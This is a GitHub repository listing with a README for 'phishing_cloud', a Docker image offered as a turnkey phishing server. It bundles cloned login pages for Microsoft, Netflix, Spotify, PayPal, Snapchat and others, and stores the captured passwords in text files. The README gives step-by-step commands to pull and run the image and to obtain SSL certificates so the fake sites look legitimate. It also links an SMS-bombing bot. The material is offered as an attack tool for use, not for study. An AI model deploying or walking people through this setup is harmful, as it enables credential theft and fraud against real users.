https://github.com/harshsinghvi/cloud-build
https://github.com/harshsinghvi/cloud-build
Last synced: about 1 month ago
JSON representation
- Host: GitHub
- URL: https://github.com/harshsinghvi/cloud-build
- Owner: harshsinghvi
- License: apache-2.0
- Created: 2020-06-15T14:20:50.000Z (almost 5 years ago)
- Default Branch: master
- Last Pushed: 2020-07-05T11:46:15.000Z (almost 5 years ago)
- Last Synced: 2025-02-05T09:18:37.145Z (3 months ago)
- Language: HTML
- Size: 3.86 MB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# phishing_cloud
Doceker Image Build for using any Cloud Server or Computer as a Phishing server.Docker Repo: https://hub.docker.com/r/insomniaccoder/phishing
Refer My Blog for usage : https://harshsinghvi.github.io/blog/is-cloud-a-tool-for-hackers/
* In this Docker image I have made installed many sites
* for login page `https:///.html`
* for passwords `https:///.txt`
* for common passwords file `https:///raw.txt`
* for common login page `https:///index.html` or simply `https://`### List of available sites
* microsoft
* netflix
* spotify
* paypal
* instafollowers
* snapchat
* more websites coming soon at my Docker Hub Repository.## Usage
* Install docker image made my me (https://hub.docker.com/r/insomniaccoder/phishing)
```bash
sudo docker pull insomniaccoder/phishing
sudo docker run -d -it --name phishing_demo -p 80:80 -p 443:443 insomniaccoder/phishing # I have made this image myself for you guys
```
Getting SSL Certificate
```bash
sudo docker exec -it phishing_demo bash # connect to the container
ls # to see the installed sites in the container
certbot --apache --register-unsafely-without-email -d # complete the precess and you got the SSL certificate
```
## Build your own
```bash
git clone https://github.com/harshsinghvi/phishing_cloud.git
cd phishing_cloud
docker -t .
```
## Build Multi-Arch Images
Refer this guide* My Website : https://harshsinghvi.github.io
* My GitHub Profile : https://github.com/harshsinghvi/sms-bomb-telegram-bot-docker
* Docker Hub Profile: https://hub.docker.com/r/insomniaccoder/smsbomb